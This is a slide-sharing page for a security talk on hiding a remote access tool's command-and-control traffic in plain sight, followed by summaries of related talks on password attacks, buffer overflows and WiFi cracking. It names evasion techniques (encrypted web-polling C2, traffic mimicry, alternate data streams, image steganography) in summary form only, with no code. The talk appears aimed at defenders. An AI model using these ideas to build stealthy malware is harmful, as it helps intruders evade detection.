CodeStock14: Hiding in Plain Sight
•
0 likes•4,932 views
This document discusses techniques for hiding malicious software and command and control traffic in plain sight. It describes designing a RAT that uses encryption and queries web pages for commands. It also discusses mimicking normal user behavior by monitoring traffic rates and target URLs. Additional hiding techniques explored include using alternate data streams, least significant bit encoding in images, and abusing network protocols. The document emphasizes that behavior monitoring must be part of security strategies to detect such concealed threats.
Report
Share
Report
Share
Download to read offline
Recommended
What's in a password
This document summarizes a presentation about password attacks from 2013. It describes several major password breaches that year, including Adobe (153 million accounts breached), Twitter (250,000 accounts breached), and others. It also discusses different types of password attacks like dictionary attacks, brute force attacks, and mask attacks. The document provides examples of these attacks in action and strategies to help strengthen passwords.
Get with the Pact - Gotchas of Implementing Contract Testing the right way
I gave this workshop at the European Testing Conference 2020 (https://europeantestingconference.eu/2020/).
The aim was to get to know some of the fundamentals of Pact more in-depth, and making sure we really get them right before we move on to scale this approach.
SFScon14: write java, run javascript: create enterprise html5 apps without “u...
SFScon14: write java, run javascript: create enterprise html5 apps without “u...South Tyrol Free Software Conference
Davide Montesin's talk about "write java, run javascript: create enterprise html5 apps without “undefined” bugs" during the #SFScon14ETCSS: Into the Mind of a Hacker
The document describes an anatomy of a buffer overflow attack. It begins with disclaimers about the legal and ethical responsibilities when discussing exploits. It then provides an overview of the scenario which involves exploiting a vulnerability in a Windows FTP server to obtain a reverse shell. It defines relevant terminology like buffers, fuzzing, shellcode and bind/reverse shells. It also provides examples of assembly shellcode and encoded shellcode. Finally, it outlines the process of identifying the vulnerability, designing an exploit through fuzzing and overwriting registers, and obtaining a shell through the exploit.
DevOps + MongoDB Realm Serverless Functions = 🤩
Serverless application development is fabulous…but if you don’t have a CI/CD pipeline with a strong foundation of test automation, you’ll likely fail.
In this session, MongoDB Developer Advocate Lauren Schaefer will walk you through the process of crafting test automation and DevOps pipelines for serverless apps that are built on MongoDB Realm. Then, she’ll jump into the always-terrifying-for-the-presenter live demo so you can see how this all works in a very practical way. She’ll make some changes to her codebase, update her automated tests, and push her code changes. You’ll watch as the various pieces of the pipeline fail and (hopefully) succeed.
You’ll walk away from this session equipped to build test automation and DevOps pipelines for your serverless apps.
Ops is dead. long live ops.
Ops is the past! DevOps is the present ! SRE is for giants! NoOps is the future! Fowler even says that a DevOps Engineer is an anti-pattern!
So will our job disappear in 10 years? What can we do about it? What is the next set of skills that we need? A startup is often a precursor to larger changes. I'll tell you what we are trying to do at Curve, a Fintech startup where developers build Kubernetes clusters and the SRE team codes microservices.
DevOps + MongoDB Serverless =
Serverless application development is fabulous…but, if you can’t automate your delivery pipeline, you’ll likely fail.
In this session, MongoDB Developer Advocate Lauren Schaefer will walk you through the process of crafting test automation and DevOps pipelines for serverless apps that are built on the MongoDB Data Platform. Then, she’ll jump in to the always-terrifying-for-the-presenter live demo so you can see how this all works in a very practical way. She’ll make some changes to her code base, update her automated tests, and push her code changes. You’ll watch as the various pieces of the pipeline fail and (hopefully) succeed.
If you’re a DevOps engineer or a developer responsible for creating your own Continuous Integration/Continuous Delivery automation, you won’t want to miss this talk! You’ll walk away from this session equipped to build DevOps pipelines for your serverless apps.
Register for the webinar at https://www.mongodb.com/webinar/devops-with-mongodb-serverless
NanoSec Conference 2019: Code Execution Analysis in Mobile Apps - Abdullah Jo...
Talk was presented by Abdullah Joseph at NanoSec Conference 2019, InterContinental Hotel Kuala Lumpur on the 9th of October 2019.
Recommended
What's in a password
This document summarizes a presentation about password attacks from 2013. It describes several major password breaches that year, including Adobe (153 million accounts breached), Twitter (250,000 accounts breached), and others. It also discusses different types of password attacks like dictionary attacks, brute force attacks, and mask attacks. The document provides examples of these attacks in action and strategies to help strengthen passwords.
Get with the Pact - Gotchas of Implementing Contract Testing the right way
I gave this workshop at the European Testing Conference 2020 (https://europeantestingconference.eu/2020/).
The aim was to get to know some of the fundamentals of Pact more in-depth, and making sure we really get them right before we move on to scale this approach.
SFScon14: write java, run javascript: create enterprise html5 apps without “u...
SFScon14: write java, run javascript: create enterprise html5 apps without “u...South Tyrol Free Software Conference
Davide Montesin's talk about "write java, run javascript: create enterprise html5 apps without “undefined” bugs" during the #SFScon14ETCSS: Into the Mind of a Hacker
The document describes an anatomy of a buffer overflow attack. It begins with disclaimers about the legal and ethical responsibilities when discussing exploits. It then provides an overview of the scenario which involves exploiting a vulnerability in a Windows FTP server to obtain a reverse shell. It defines relevant terminology like buffers, fuzzing, shellcode and bind/reverse shells. It also provides examples of assembly shellcode and encoded shellcode. Finally, it outlines the process of identifying the vulnerability, designing an exploit through fuzzing and overwriting registers, and obtaining a shell through the exploit.
DevOps + MongoDB Realm Serverless Functions = 🤩
Serverless application development is fabulous…but if you don’t have a CI/CD pipeline with a strong foundation of test automation, you’ll likely fail.
In this session, MongoDB Developer Advocate Lauren Schaefer will walk you through the process of crafting test automation and DevOps pipelines for serverless apps that are built on MongoDB Realm. Then, she’ll jump into the always-terrifying-for-the-presenter live demo so you can see how this all works in a very practical way. She’ll make some changes to her codebase, update her automated tests, and push her code changes. You’ll watch as the various pieces of the pipeline fail and (hopefully) succeed.
You’ll walk away from this session equipped to build test automation and DevOps pipelines for your serverless apps.
Ops is dead. long live ops.
Ops is the past! DevOps is the present ! SRE is for giants! NoOps is the future! Fowler even says that a DevOps Engineer is an anti-pattern!
So will our job disappear in 10 years? What can we do about it? What is the next set of skills that we need? A startup is often a precursor to larger changes. I'll tell you what we are trying to do at Curve, a Fintech startup where developers build Kubernetes clusters and the SRE team codes microservices.
DevOps + MongoDB Serverless =
Serverless application development is fabulous…but, if you can’t automate your delivery pipeline, you’ll likely fail.
In this session, MongoDB Developer Advocate Lauren Schaefer will walk you through the process of crafting test automation and DevOps pipelines for serverless apps that are built on the MongoDB Data Platform. Then, she’ll jump in to the always-terrifying-for-the-presenter live demo so you can see how this all works in a very practical way. She’ll make some changes to her code base, update her automated tests, and push her code changes. You’ll watch as the various pieces of the pipeline fail and (hopefully) succeed.
If you’re a DevOps engineer or a developer responsible for creating your own Continuous Integration/Continuous Delivery automation, you won’t want to miss this talk! You’ll walk away from this session equipped to build DevOps pipelines for your serverless apps.
Register for the webinar at https://www.mongodb.com/webinar/devops-with-mongodb-serverless
NanoSec Conference 2019: Code Execution Analysis in Mobile Apps - Abdullah Jo...
Talk was presented by Abdullah Joseph at NanoSec Conference 2019, InterContinental Hotel Kuala Lumpur on the 9th of October 2019.
Github github-github
The document discusses how GitHub uses tools like branches, pull requests, and bots to facilitate asynchronous and distributed collaboration. Pull requests are highlighted as a way to have code discussions, review changes, and integrate work without meetings or deadlines. Bots like Hubot are also discussed as a way to automate common tasks and integrate GitHub with other services. The use of simple tools and resistance to unnecessary process is advocated to allow focusing on shipping work.
Trends in Enterprise DevOps (August 2020)
Covid has disrupted humanity, Cloud is eating the world,
and renewed interest in digital investment means DevOps is breaking new ground of delivering rapid client-value. It is heartening to see that while repetitive ongoing analysis seems to be being replaced by initiatives that pack a punch in driving rapid, transformative value in short times (e.g. dojos, design sprints, no-fuss tooling).
SOA.2020
This document discusses Service Oriented Architecture (SOA) and related concepts like APIs and microservices. It provides an overview of SOA and notes its focus on services, abstraction, interoperability, and flexibility. APIs are discussed as being focused on REST and JSON for external use cases, while microservices emphasize isolation, anti-fragility, and scalability but at the cost of infrastructure complexity. The document poses exercises around designing a banking system using SOA modeling and architecture.
Von JavaEE auf Microservice in 6 Monaten - The Good, the Bad, and the wtfs...
This document summarizes a talk about transitioning from JavaEE monoliths to microservices architecture in 6 months. It discusses the reasons for moving to microservices (faster development and deployment, lower costs), and the challenges including organizing configuration, communication between services, and deployment. It then outlines the steps taken to implement microservices at a company, including setting up continuous integration, using Spring Boot and Cloud, and establishing vertical feature teams to overcome organizational barriers. The key lessons are that the transition does not require a "big bang", can start with a single service, and works best by automating the development and deployment process from development to production.
Blue team reboot - HackFest
Co Speaker: Cheryl Biswas
Talk Description:
How about this: a blue team talk given by red teamers. But here’s our rationale - your best defence right now is a strategic offence. The rules of the game have changed and we need to get defence up to speed.
We’ll show you what the key elements are in a good defence strategy; what you can and need to be using to full advantage. We’ll talk about the new “buzzwords” and how they apply: visibility; patterns; big data. There’s a whole lotta data to wrangle, and you aren’t seeing the whole picture if you aren’t doing things right. Threat intel is about getting the big picture as it applies to you. You’ll learn the importance of context and prioritization so that you can manipulate intel feeds to do your bidding. And then we’ll take things further and talk about hunting the adversary, using an update on proven methodologies.
We’ll show you how to understand your data, correlate threats and pin point attacks. Attendees will leave with a new understanding of the resources they have on hand, and how to leverage those into an Adaptive Proactive Defense Strategy.
API-First Design and Django
Let's talk about some concepts from API-First, and how to apply them to a Django-powered environment. We'll mention GraphQL, of course.
10 Reasons Your Software Sucks - Election 2012 Edition
The document provides an overview of 10 reasons why software sucks and 10 practices needed to improve it. It discusses topics around development experience, object orientation, SOLID principles, patterns, secure coding, source control, automated testing, continuous integration/delivery, agile practices, and continuous learning. The overall message is that following best practices around these topics can help build better software and engineering teams.
Dirigible @ Skyscanner
This is the presentation from Meetup, that was held at Skyscanner, Sofia: https://www.meetup.com/Code-Voyagers-Sofia/events/256913292/
In the context of business application development, the dream of every Java developer is to have a quick turn-around time. On the other side, in the same context, the dream of every JavaScript developer is to build scalable applications, based on proven technology. See how these two worlds meet under the umbrella of Eclipse Dirigible – an Open Source RAD Low-Code/No-Code Platform.
X-celerate 2019: Iterating fast with the MERN Stack
In this talk, Martin covers how an All-JavaScript approach with MongoDB, Express, React and Node.js (MERN) enables iterating fast, picking the example of the quickly growing product 'myOnboarding' by Haufe-Lexware. He touches on the pros and cons of this technology stack, how the technology ties in to the product's microservices architecture, and how the product team leverages CI/CD to be able to act, and react, fast and securely. The talk further touches on how the product team setup and customer feedback is crucial to iterate fast, in the right direction.
CloudLand 2023: Rock, Paper, Scissors Cloud Competition - Go vs. Java
Wir implementieren "Rock, Paper, Scissors" als Cloud-Anwendung. Das Frontend stellen wir, ihr implementiert das Backend gegen eine vorhandene REST API Definition. Dazu nutzt ihr entweder Go (betreut von Jan Stamer) oder Java (betreut von Lena Grimm). Zum Abschluss tauschen wir die gewonnenen Erfahrungen in einer Fishbowl Session aus.
Die "Rock, Paper, Scissors"-Anwendung fängt klein an wird immer weiter ausgebaut:
Stufe 1: Einfache REST API, über die gegen den Computer gespielt wird. Das Backend wird von Beginn an cloud-native aufgesetzt, gemäß den 12 Prinzipien der "Twelve-Factor-App".
Stufe 2: Wir erstellen ein Spiel, das wir per Link mit einem anderen Spieler teilen. Dazu muss das Backend die laufenden Spiele verwalten. Wir fangen an und halten die Spiele im Hauptspeicher. Danach persistieren wir die Spiele in einer Datenbank. Die Verwaltung der Spiele muss skalierbar und auf den Betrieb in dynamischen Cloud-Umgebungen eingestellt sein.
Stufe 3: Wer noch mehr schafft, kann in Echtzeit gegen andere spielen und bspw. ein Leaderboard mit Highscores umsetzen.
[Intel Android Webinar Series] Esploriamo Intel XDK, uno strumento incredibile
Salvino Fidacaro is a developer and project manager at Goowai and manager of the Google Developer Group Nebrodi. He is also an Intel Software Innovator. His projects involve developing, emulating, testing, debugging, profiling and building Cordova hybrid mobile apps that can be deployed to various app stores and platforms. He provides information on configuring devices for emulation and remote debugging sessions to profile and analyze JavaScript performance.
Jaap Groeneveld - Software Engineering Principles
This document discusses principles of software engineering and clean code. It emphasizes keeping code simple, avoiding duplication, using descriptive names, separating concerns, minimizing dependencies between modules, and writing code that is easy to understand and modify over time. Some key principles mentioned include single responsibility, following the step-down rule for readability, avoiding implicit dependencies, and keeping modules loosely coupled and highly cohesive.
Gauravsing sisodiya
- The document provides a summary of Gauravsing B. Sisodiya's work experience and technical skills. He has over 6 years of experience as a Hybris developer working on e-commerce projects. He has expertise in Hybris, Java, Spring and working in agile environments. His most recent roles involve leading development of custom modules and configurations for clients such as Corsair, Nitori and Royal Caribbean Cruises.
Gauravsing sisodiya
- Gauravsing B. Sisodiya has over 6 years of experience as a Hybris developer, with expertise in e-commerce application development, MVC architecture using Spring, and handling production support.
- He has strong technical skills in Java, HTML, XML, databases, and Hybris-specific tools.
- His experience includes roles as a senior developer for clients in industries such as retail, travel, and eyewear, where he has worked on features such as custom modules, reporting, account management, and site migrations.
NoOps for noobs; why i think Devs do not need Ops
DevOps, NoOps -> it's all about delivering business value to your customers faster and with better quality.
What Web Framework To Use?
A great idea can be built with almost any technology. The success or failure of your project has more to do with vision, leadership, execution, and market than technological choices.
Besides the vision, a lot of startups focus on culture. what isn’t often mentioned is that the technical decisions will have a direct effect on the company culture. Great things have been built with each of the technologies. But they do come with a culture.
The purpose of this presentation is to help developers, managers, founders, etc. to make an insightful decision about the framework they want to use to create their product.
apidays Australia 2022 - Lessons from doing EdgeDevOps (GitOps) in the bush, ...
apidays Australia 2022 - Enabling Business Networks
September 14 & 15, 2022
Lessons from doing EdgeDevOps (GitOps) in the bush, air, and underwater
Dasith Wijesiriwardena, Senior Software Engineer at Microsoft
Juan Burckhardt, Senior Software Engineer at Microsoft
Suganya Srinivasan, Senior Software Engineer at Microsoft
Jason Goodsell, Senior Software Engineer at Microsoft
------------
Check out our conferences at https://www.apidays.global/
Do you want to sponsor or talk at one of our conferences?
https://apidays.typeform.com/to/ILJeAaV8
Learn more on APIscene, the global media made by the community for the community:
https://www.apiscene.io
Explore the API ecosystem with the API Landscape:
https://apilandscape.apiscene.io/
Deep dive into the API industry with our reports:
https://www.apidays.global/industry-reports/
Subscribe to our global newsletter:
https://apidays.typeform.com/to/i1MPEW
AI: Your Personal Intern
The document discusses how artificial intelligence can help enhance productivity and creativity for developers by assisting with repetitive coding tasks. It notes that AI is undergoing rapid growth and learning new skills like writing code, generating images, and more. However, the document also outlines some issues with AI like limited knowledge, lack of creativity, data privacy concerns, and questions around intellectual property ownership.
Teaching Elephants to Dance (and Fly!) A Developer's Journey to Digital Trans...
We can be brilliant developers, but we won’t succeed—and won’t lead our organizations to succeed—without a new perspective (if you will) and new assumptions about the components of the “technology ecosystem” that are fundamentally critical to our success. This includes the operators, QA team, DBAs, security folks, and even the pure business contingent—in most cases, each of these individuals and groups plays a critical role in the success of what we create and give birth to as developers. What we do in isolation might be genius, but if we insulate ourselves—especially with arrogance—from these colleagues, neither our code nor our organizations will realize their full potential, and most will fail. The bottom line is that our old ways are no longer viable, and as the elite within our industry, we will be the leaders and heroes who discard old assumptions and adopt a new perspective in this exciting journey to digital transformation—where the impossible can become reality.
Notes (2012-06-08)
The document discusses web apps, defining them as websites that perform a useful function, are targeted at smartphones, and are built using web technologies with some native code. It covers aspects of developing web apps such as tools, tricks, and trade-offs involved in the development process. The key tasks in developing a web app are conceptualizing what it will do, creating wireframes, developing the server-side code, client-side code, and native wrappers for different devices.
How well do you know your runtime
This is a quick experiment in messing with the .NET framework for the purpose of showing potential attacks if someone gets root on a machine.
Presented at CodeMash, January 8, 2014
Software defined radio and the hacker
This is a quick overview of my initial delving into SDR from a pen testing perspective. It is admittedly very basic and introductory - I hope to expand the talk quite a bit over the coming months.
Presented at CodeMash, January 8, 2014
More Related Content
Similar to CodeStock14: Hiding in Plain Sight
Github github-github
The document discusses how GitHub uses tools like branches, pull requests, and bots to facilitate asynchronous and distributed collaboration. Pull requests are highlighted as a way to have code discussions, review changes, and integrate work without meetings or deadlines. Bots like Hubot are also discussed as a way to automate common tasks and integrate GitHub with other services. The use of simple tools and resistance to unnecessary process is advocated to allow focusing on shipping work.
Trends in Enterprise DevOps (August 2020)
Covid has disrupted humanity, Cloud is eating the world,
and renewed interest in digital investment means DevOps is breaking new ground of delivering rapid client-value. It is heartening to see that while repetitive ongoing analysis seems to be being replaced by initiatives that pack a punch in driving rapid, transformative value in short times (e.g. dojos, design sprints, no-fuss tooling).
SOA.2020
This document discusses Service Oriented Architecture (SOA) and related concepts like APIs and microservices. It provides an overview of SOA and notes its focus on services, abstraction, interoperability, and flexibility. APIs are discussed as being focused on REST and JSON for external use cases, while microservices emphasize isolation, anti-fragility, and scalability but at the cost of infrastructure complexity. The document poses exercises around designing a banking system using SOA modeling and architecture.
Von JavaEE auf Microservice in 6 Monaten - The Good, the Bad, and the wtfs...
This document summarizes a talk about transitioning from JavaEE monoliths to microservices architecture in 6 months. It discusses the reasons for moving to microservices (faster development and deployment, lower costs), and the challenges including organizing configuration, communication between services, and deployment. It then outlines the steps taken to implement microservices at a company, including setting up continuous integration, using Spring Boot and Cloud, and establishing vertical feature teams to overcome organizational barriers. The key lessons are that the transition does not require a "big bang", can start with a single service, and works best by automating the development and deployment process from development to production.
Blue team reboot - HackFest
Co Speaker: Cheryl Biswas
Talk Description:
How about this: a blue team talk given by red teamers. But here’s our rationale - your best defence right now is a strategic offence. The rules of the game have changed and we need to get defence up to speed.
We’ll show you what the key elements are in a good defence strategy; what you can and need to be using to full advantage. We’ll talk about the new “buzzwords” and how they apply: visibility; patterns; big data. There’s a whole lotta data to wrangle, and you aren’t seeing the whole picture if you aren’t doing things right. Threat intel is about getting the big picture as it applies to you. You’ll learn the importance of context and prioritization so that you can manipulate intel feeds to do your bidding. And then we’ll take things further and talk about hunting the adversary, using an update on proven methodologies.
We’ll show you how to understand your data, correlate threats and pin point attacks. Attendees will leave with a new understanding of the resources they have on hand, and how to leverage those into an Adaptive Proactive Defense Strategy.
API-First Design and Django
Let's talk about some concepts from API-First, and how to apply them to a Django-powered environment. We'll mention GraphQL, of course.
10 Reasons Your Software Sucks - Election 2012 Edition
The document provides an overview of 10 reasons why software sucks and 10 practices needed to improve it. It discusses topics around development experience, object orientation, SOLID principles, patterns, secure coding, source control, automated testing, continuous integration/delivery, agile practices, and continuous learning. The overall message is that following best practices around these topics can help build better software and engineering teams.
Dirigible @ Skyscanner
This is the presentation from Meetup, that was held at Skyscanner, Sofia: https://www.meetup.com/Code-Voyagers-Sofia/events/256913292/
In the context of business application development, the dream of every Java developer is to have a quick turn-around time. On the other side, in the same context, the dream of every JavaScript developer is to build scalable applications, based on proven technology. See how these two worlds meet under the umbrella of Eclipse Dirigible – an Open Source RAD Low-Code/No-Code Platform.
X-celerate 2019: Iterating fast with the MERN Stack
In this talk, Martin covers how an All-JavaScript approach with MongoDB, Express, React and Node.js (MERN) enables iterating fast, picking the example of the quickly growing product 'myOnboarding' by Haufe-Lexware. He touches on the pros and cons of this technology stack, how the technology ties in to the product's microservices architecture, and how the product team leverages CI/CD to be able to act, and react, fast and securely. The talk further touches on how the product team setup and customer feedback is crucial to iterate fast, in the right direction.
CloudLand 2023: Rock, Paper, Scissors Cloud Competition - Go vs. Java
Wir implementieren "Rock, Paper, Scissors" als Cloud-Anwendung. Das Frontend stellen wir, ihr implementiert das Backend gegen eine vorhandene REST API Definition. Dazu nutzt ihr entweder Go (betreut von Jan Stamer) oder Java (betreut von Lena Grimm). Zum Abschluss tauschen wir die gewonnenen Erfahrungen in einer Fishbowl Session aus.
Die "Rock, Paper, Scissors"-Anwendung fängt klein an wird immer weiter ausgebaut:
Stufe 1: Einfache REST API, über die gegen den Computer gespielt wird. Das Backend wird von Beginn an cloud-native aufgesetzt, gemäß den 12 Prinzipien der "Twelve-Factor-App".
Stufe 2: Wir erstellen ein Spiel, das wir per Link mit einem anderen Spieler teilen. Dazu muss das Backend die laufenden Spiele verwalten. Wir fangen an und halten die Spiele im Hauptspeicher. Danach persistieren wir die Spiele in einer Datenbank. Die Verwaltung der Spiele muss skalierbar und auf den Betrieb in dynamischen Cloud-Umgebungen eingestellt sein.
Stufe 3: Wer noch mehr schafft, kann in Echtzeit gegen andere spielen und bspw. ein Leaderboard mit Highscores umsetzen.
[Intel Android Webinar Series] Esploriamo Intel XDK, uno strumento incredibile
Salvino Fidacaro is a developer and project manager at Goowai and manager of the Google Developer Group Nebrodi. He is also an Intel Software Innovator. His projects involve developing, emulating, testing, debugging, profiling and building Cordova hybrid mobile apps that can be deployed to various app stores and platforms. He provides information on configuring devices for emulation and remote debugging sessions to profile and analyze JavaScript performance.
Jaap Groeneveld - Software Engineering Principles
This document discusses principles of software engineering and clean code. It emphasizes keeping code simple, avoiding duplication, using descriptive names, separating concerns, minimizing dependencies between modules, and writing code that is easy to understand and modify over time. Some key principles mentioned include single responsibility, following the step-down rule for readability, avoiding implicit dependencies, and keeping modules loosely coupled and highly cohesive.
Gauravsing sisodiya
- The document provides a summary of Gauravsing B. Sisodiya's work experience and technical skills. He has over 6 years of experience as a Hybris developer working on e-commerce projects. He has expertise in Hybris, Java, Spring and working in agile environments. His most recent roles involve leading development of custom modules and configurations for clients such as Corsair, Nitori and Royal Caribbean Cruises.
Gauravsing sisodiya
- Gauravsing B. Sisodiya has over 6 years of experience as a Hybris developer, with expertise in e-commerce application development, MVC architecture using Spring, and handling production support.
- He has strong technical skills in Java, HTML, XML, databases, and Hybris-specific tools.
- His experience includes roles as a senior developer for clients in industries such as retail, travel, and eyewear, where he has worked on features such as custom modules, reporting, account management, and site migrations.
NoOps for noobs; why i think Devs do not need Ops
DevOps, NoOps -> it's all about delivering business value to your customers faster and with better quality.
What Web Framework To Use?
A great idea can be built with almost any technology. The success or failure of your project has more to do with vision, leadership, execution, and market than technological choices.
Besides the vision, a lot of startups focus on culture. what isn’t often mentioned is that the technical decisions will have a direct effect on the company culture. Great things have been built with each of the technologies. But they do come with a culture.
The purpose of this presentation is to help developers, managers, founders, etc. to make an insightful decision about the framework they want to use to create their product.
apidays Australia 2022 - Lessons from doing EdgeDevOps (GitOps) in the bush, ...
apidays Australia 2022 - Enabling Business Networks
September 14 & 15, 2022
Lessons from doing EdgeDevOps (GitOps) in the bush, air, and underwater
Dasith Wijesiriwardena, Senior Software Engineer at Microsoft
Juan Burckhardt, Senior Software Engineer at Microsoft
Suganya Srinivasan, Senior Software Engineer at Microsoft
Jason Goodsell, Senior Software Engineer at Microsoft
------------
Check out our conferences at https://www.apidays.global/
Do you want to sponsor or talk at one of our conferences?
https://apidays.typeform.com/to/ILJeAaV8
Learn more on APIscene, the global media made by the community for the community:
https://www.apiscene.io
Explore the API ecosystem with the API Landscape:
https://apilandscape.apiscene.io/
Deep dive into the API industry with our reports:
https://www.apidays.global/industry-reports/
Subscribe to our global newsletter:
https://apidays.typeform.com/to/i1MPEW
AI: Your Personal Intern
The document discusses how artificial intelligence can help enhance productivity and creativity for developers by assisting with repetitive coding tasks. It notes that AI is undergoing rapid growth and learning new skills like writing code, generating images, and more. However, the document also outlines some issues with AI like limited knowledge, lack of creativity, data privacy concerns, and questions around intellectual property ownership.
Teaching Elephants to Dance (and Fly!) A Developer's Journey to Digital Trans...
We can be brilliant developers, but we won’t succeed—and won’t lead our organizations to succeed—without a new perspective (if you will) and new assumptions about the components of the “technology ecosystem” that are fundamentally critical to our success. This includes the operators, QA team, DBAs, security folks, and even the pure business contingent—in most cases, each of these individuals and groups plays a critical role in the success of what we create and give birth to as developers. What we do in isolation might be genius, but if we insulate ourselves—especially with arrogance—from these colleagues, neither our code nor our organizations will realize their full potential, and most will fail. The bottom line is that our old ways are no longer viable, and as the elite within our industry, we will be the leaders and heroes who discard old assumptions and adopt a new perspective in this exciting journey to digital transformation—where the impossible can become reality.
Notes (2012-06-08)
The document discusses web apps, defining them as websites that perform a useful function, are targeted at smartphones, and are built using web technologies with some native code. It covers aspects of developing web apps such as tools, tricks, and trade-offs involved in the development process. The key tasks in developing a web app are conceptualizing what it will do, creating wireframes, developing the server-side code, client-side code, and native wrappers for different devices.
Similar to CodeStock14: Hiding in Plain Sight (20)
Von JavaEE auf Microservice in 6 Monaten - The Good, the Bad, and the wtfs...
Von JavaEE auf Microservice in 6 Monaten - The Good, the Bad, and the wtfs...
10 Reasons Your Software Sucks - Election 2012 Edition
10 Reasons Your Software Sucks - Election 2012 Edition
X-celerate 2019: Iterating fast with the MERN Stack
X-celerate 2019: Iterating fast with the MERN Stack
CloudLand 2023: Rock, Paper, Scissors Cloud Competition - Go vs. Java
CloudLand 2023: Rock, Paper, Scissors Cloud Competition - Go vs. Java
[Intel Android Webinar Series] Esploriamo Intel XDK, uno strumento incredibile
[Intel Android Webinar Series] Esploriamo Intel XDK, uno strumento incredibile
apidays Australia 2022 - Lessons from doing EdgeDevOps (GitOps) in the bush, ...
apidays Australia 2022 - Lessons from doing EdgeDevOps (GitOps) in the bush, ...
Teaching Elephants to Dance (and Fly!) A Developer's Journey to Digital Trans...
Teaching Elephants to Dance (and Fly!) A Developer's Journey to Digital Trans...
More from Rob Gillen
How well do you know your runtime
This is a quick experiment in messing with the .NET framework for the purpose of showing potential attacks if someone gets root on a machine.
Presented at CodeMash, January 8, 2014
Software defined radio and the hacker
This is a quick overview of my initial delving into SDR from a pen testing perspective. It is admittedly very basic and introductory - I hope to expand the talk quite a bit over the coming months.
Presented at CodeMash, January 8, 2014
So whats in a password
Talk from CodeMash on Passwords, cracking them, and intelligent approaches to getting past them.
Presented at CodeMash, January 8, 2014
Hiding in plain sight
This talk focuses on various ways to attempt to be as much like normal users/behavior/traffic as possible. We also demonstrate the limitations of signature-based detection systems and then discuss a prototype Remote Access Tool (RAT) that is designed to blend in with normal activity.
Presented at CodeMash, January 8, 2014
DevLink - WiFu: You think your wireless is secure?
The document discusses attacks on WiFi networks and provides an overview of wireless security testing tools and techniques. It notes that most attacks described would be illegal without permission and assumes no responsibility. It then covers wireless packet frames, packet sniffing filters, packet injection, wireless channels, hidden SSIDs, MAC filters, WEP cracking, WPA/WPA2 cracking using dictionaries, wireless security testing tools like Pineapple and Reaver, and recommendations for more secure wireless practices.
You think your WiFi is safe?
This document summarizes a presentation on wireless security testing and attacks. It describes tools like airodump-ng for packet sniffing, aireplay-ng for packet injection, and aircrack-ng for cracking wireless encryption keys. It demonstrates attacks like cracking WEP encryption, exploiting vulnerabilities in WPS, and performing man-in-the-middle attacks. The presentation emphasizes that these attacks would be illegal to perform without permission and stresses the importance of responsible disclosure.
Anatomy of a Buffer Overflow Attack
Slides from my talk at CodeStock 2012 describing the process of exploiting a buffer overflow vulnerability.
Intro to GPGPU with CUDA (DevLink)
The document provides an overview of introductory GPGPU programming with CUDA. It discusses why GPUs are useful for parallel computing applications due to their high FLOPS and memory bandwidth capabilities. It then outlines the CUDA programming model, including launching kernels on the GPU with grids and blocks of threads, and memory management between CPU and GPU. As an example, it walks through a simple matrix multiplication problem implemented on the CPU and GPU to illustrate CUDA programming concepts.
AWS vs. Azure
This document compares and contrasts Amazon Web Services and Windows Azure cloud platforms. It provides an overview of the different types of cloud services offered, including infrastructure as a service, platform as a service and private clouds. It then details the specific services available in each platform, such as compute, storage, databases and networking. Examples are given of how to architect applications for fault tolerance across cloud services.
A Comparison of AWS and Azure - Part2
This document summarizes Rob Gillen's presentation on Amazon Web Services (AWS) and Windows Azure. The presentation covers:
1. An overview of the cloud computing market and discussion of core cloud primitives.
2. Examples of fault tolerance techniques used by AWS and Azure like regions, availability zones, load balancing, and replication.
3. Lessons learned on vendor-specific implementations including an example of an incorrect network change at AWS that caused a "replication storm".
4. Examples of application architectures that leverage cloud services for dynamic scaling, fault tolerance, and background processing using independent components, load balancing, and queues.
A Comparison of AWS and Azure - Part 1
This document summarizes a presentation about Amazon Web Services and Windows Azure. It discusses the different types of cloud computing including private, infrastructure as a service, and platform as a service clouds. It then provides overviews of the various services offered on AWS and Windows Azure, such as compute, storage, databases, networking, deployment and tooling. The presentation aims to compare and contrast the capabilities and approaches of the two major cloud platforms.
Intro to GPGPU Programming with Cuda
1) The document provides an introduction to GPGPU programming with CUDA, outlining goals of providing an overview and vision for using GPUs to improve applications.
2) Key aspects of GPU programming are discussed, including the large number of cores devoted to data processing, example applications that are well-suited to parallelization, and the CUDA tooling in Visual Studio.
3) A hands-on example of matrix multiplication is presented to demonstrate basic CUDA programming concepts like memory management between host and device, kernel invocation across a grid of blocks, and using thread IDs to parallelize work.
Scaling Document Clustering in the Cloud
This document discusses scaling document clustering algorithms in the cloud. It describes an existing tool called Piranha that can search and analyze documents to organize them based on content and identify similar documents. The author discusses challenges with existing approaches being memory bound or having distribution issues. Current work is exploring using cloud platforms to provide scalability and accessibility while utilizing features like fault tolerance. Early results show promise in scaling to process larger document sets in the cloud compared to traditional HPC methods. Future work areas include optimizing work unit size and balancing scale, stability and speed.
Hands On with Amazon Web Services (StirTrek)
This document summarizes a presentation about Amazon Web Services (AWS) given by Rob Gillen. It introduces the main AWS products like EC2, S3, SQS, and others. It discusses the major AWS outage in April 2011 and lessons learned from companies that were affected and survived versus those that were affected and did not survive. It also provides recommendations for building highly available and fault tolerant systems on AWS, such as replicating data across availability zones and using queues to isolate system components.
Windows Azure: Lessons From The Field
Presentation at CodeStock 2010 on the lessons learned while building an application that handles post-processing of scientific data in the Cloud.
Amazon Web Services for the .NET Developer
This document provides an overview and introduction to Amazon Web Services (AWS) for .NET developers. It discusses various AWS computing and storage services including Elastic Compute Cloud (EC2), Simple Storage Service (S3), Simple Queue Service (SQS), SimpleDB, and Elastic Block Storage (EBS). The document outlines key concepts for these services and provides a walkthrough of setting up a Windows machine on EC2 and interacting with AWS services through code examples. It also covers tips and tools for using AWS and addresses questions from attendees.
05561 Xfer Research 02
Results from Research Institution Test 02 for cloud-hosted data transfer comparing Azure US North Central and Azure US South Central
05561 Xfer Research 01
Results from Research Institution Test 01 for cloud-hosted data transfer comparing Azure US North Central and Amazon US Standard.
05561 Xfer Consumer 01
The document summarizes a test of file transfers between a local computer and cloud storage services AWS and Azure. Tests were conducted uploading and downloading files of varying sizes from 2KB to 100MB to evaluate transfer duration, rate, and variability. Results were analyzed and reported using various visualizations and metrics to establish baseline expectations for performance of consumer internet connections to cloud storage. The research aims to improve understanding of user experience with cloud computing resources.
Cloud Storage Upload Tests 02
Second set of data from cross-cloud platform upload tests. Includes larger file sizes. (2KB to 1GB).
More from Rob Gillen (20)
DevLink - WiFu: You think your wireless is secure?
DevLink - WiFu: You think your wireless is secure?
Recently uploaded
